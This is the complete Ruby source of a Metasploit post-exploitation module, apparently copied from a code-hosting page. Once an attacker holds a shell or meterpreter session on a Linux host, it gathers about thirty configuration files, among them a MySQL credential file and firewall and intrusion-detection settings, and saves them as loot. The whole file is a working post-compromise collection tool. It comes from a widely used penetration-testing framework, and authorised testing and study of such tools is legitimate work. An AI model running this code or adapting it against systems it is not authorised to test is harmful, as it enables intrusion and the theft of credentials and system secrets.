Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Linux::System
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Linux Gather Configurations',
14
        'Description' => %q{
15
          This module collects configuration files found on commonly installed
16
          applications and services, such as Apache, MySQL, Samba, Sendmail, etc.
17
          If a config file is found in its default path, the module will assume
18
          that is the file we want.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [
22
          'ohdae <bindshell[at]live.com>',
23
        ],
24
        'Platform' => ['linux'],
25
        'SessionTypes' => ['shell', 'meterpreter']
26
      )
27
    )
28
  end
29

30
  def run
31
    distro = get_sysinfo
32

33
    print_status "Running module against #{session.session_host} [#{get_hostname}]"
34
    print_status 'Info:'
35
    print_status "\t#{distro[:version]}"
36
    print_status "\t#{distro[:kernel]}"
37

38
    vprint_status 'Finding configuration files...'
39
    find_configs
40
  end
41

42
  def save(file, data, ctype = 'text/plain')
43
    ltype = 'linux.enum.conf'
44
    fname = ::File.basename(file)
45
    loot = store_loot(ltype, ctype, session, data, fname)
46
    print_good("#{fname} stored in #{loot}")
47
  end
48

49
  def find_configs
50
    configs = [
51
      '/etc/apache2/apache2.conf', '/etc/apache2/ports.conf', '/etc/nginx/nginx.conf',
52
      '/etc/snort/snort.conf', '/etc/mysql/my.cnf', '/etc/ufw/ufw.conf',
53
      '/etc/ufw/sysctl.conf', '/etc/security.access.conf', '/etc/shells',
54
      '/etc/security/sepermit.conf', '/etc/ca-certificates.conf', '/etc/security/access.conf',
55
      '/etc/gated.conf', '/etc/rpc', '/etc/psad/psad.conf', '/etc/mysql/debian.cnf',
56
      '/etc/chkrootkit.conf', '/etc/logrotate.conf', '/etc/rkhunter.conf',
57
      '/etc/samba/smb.conf', '/etc/ldap/ldap.conf', '/etc/openldap/openldap.conf',
58
      '/etc/cups/cups.conf', '/etc/opt/lampp/etc/httpd.conf', '/etc/sysctl.conf',
59
      '/etc/proxychains.conf', '/etc/cups/snmp.conf', '/etc/mail/sendmail.conf',
60
      '/etc/snmp/snmp.conf'
61
    ]
62

63
    configs.each do |f|
64
      output = read_file(f).to_s
65
      next if output.strip.empty?
66
      next if output =~ /No such file or directory/
67

68
      save(f, output)
69
    end
70
  end
71
end
72

73